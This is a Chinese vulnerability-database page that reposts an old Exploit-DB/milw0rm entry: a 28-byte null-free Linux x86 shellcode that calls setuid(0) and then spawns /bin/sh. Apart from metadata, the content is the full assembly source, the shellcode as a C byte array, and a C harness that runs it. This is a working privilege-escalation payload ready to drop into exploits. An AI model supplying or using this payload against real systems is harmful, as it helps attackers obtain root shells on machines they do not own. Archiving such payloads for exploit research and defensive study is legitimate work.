Linux/x86 - setuid(0) + execve(/bin/sh,0,0) + Null-Free Shellcode (28 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056957 漏洞类型
发布时间 2008-11-13 更新时间 2008-11-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13333
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-------------------[ASM]----------------------

global _start
section .text
_start:
;setuid(0)
xor ebx,ebx
lea eax,[ebx+17h]
cdq
int 80h
;execve("/bin/sh",0,0)
xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
lea eax,[ecx+0Bh]
mov ebx,esp
int 80h

-------------------[/ASM]----------------------

-------------------[C]----------------------

#include <stdio.h>

const char shellcode[]= "\x31\xdb"
            "\x8d\x43\x17"
            "\x99"
            "\xcd\x80"
            "\x31\xc9"
            "\x51"
            "\x68\x6e\x2f\x73\x68"
            "\x68\x2f\x2f\x62\x69"
            "\x8d\x41\x0b"
            "\x89\xe3"
            "\xcd\x80";

int main()
{
    printf <http://www.opengroup.org/onlinepubs/009695399/functions/printf.html>("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE"
            "WITHOUT NULLS THAT SPAWNS A SHELL"
            "\n\nCoded by Chema Garcia (aka sch3m4)"
            "\n\t + sch3m4@opensec.es"
            "\n\t + http://opensec.es"
            "\n\n[+] Date: 29/11/2008"
            "\n[+] Thanks to: vlan7"
            "\n\n[+] Shellcode Size: %d bytes\n\n",
            sizeof(shellcode)-1);

    (*(void (*)()) shellcode)();

    return 0;
}

-------------------[C]---------------------- 

# milw0rm.com [2008-11-13]